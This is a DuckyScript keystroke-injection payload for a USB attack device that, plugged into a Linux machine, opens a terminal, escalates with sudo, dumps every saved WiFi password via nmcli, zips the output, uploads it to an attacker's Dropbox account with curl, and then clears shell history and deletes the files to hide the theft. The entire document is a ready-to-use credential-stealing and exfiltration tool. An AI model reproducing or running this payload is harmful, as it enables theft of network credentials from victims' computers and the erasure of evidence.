
REM #######################################################
REM #                                                     |
REM # Title        : Exfiltrate Wifi Passwords - Linux    |
REM # Author       : Aleff                                |
REM # Version      : 1.0                                  |
REM # Category     : Exfiltration, Credentials, Execution |
REM # Target       : Linux                                |
REM #                                                     |
REM #######################################################

REM Requirements:
REM     - Permissions
REM     - Internet connection
REM     - Dropbox Token

DELAY 1000
CTRL-ALT t
DELAY 2000


REM #### PREREQUISITES SECTION ####


REM Required: You need to know the sudo password and replace 'example' with this
STRING sudo su
ENTER
DELAY 1000
STRING sudo_password
ENTER
DELAY 2000

REM Required: Set here your Dropbox access TOKEN
STRING ACCESS_TOKEN="example.com"
ENTER


REM #### ZIP SECTION ####


DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER

DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER

DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX)
ENTER

DELAY 500
STRING ZIP_PATH="/home/$ZIP_NAME"
ENTER


REM #### WiFi && ZIP SECTION ####


REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
DELAY 500
STRING     nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
ENTER
DELAY 500
STRING     nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
REM Wifi exfiltration command time - It depends
DELAY 1000

STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
REM Zip operation time - It depends
DELAY 3000


REM #### EXFILTRATE SECTION ####


REM Set yout Dropbox folder name
STRING DROPBOX_FOLDER="/example"
ENTER
DELAY 500

STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER



REM #### REMOVE TRACES ####


DELAY 2000
STRING history -c
ENTER

DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER

DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER

DELAY 500
STRING exit
ENTER

DELAY 500
STRING exit
ENTER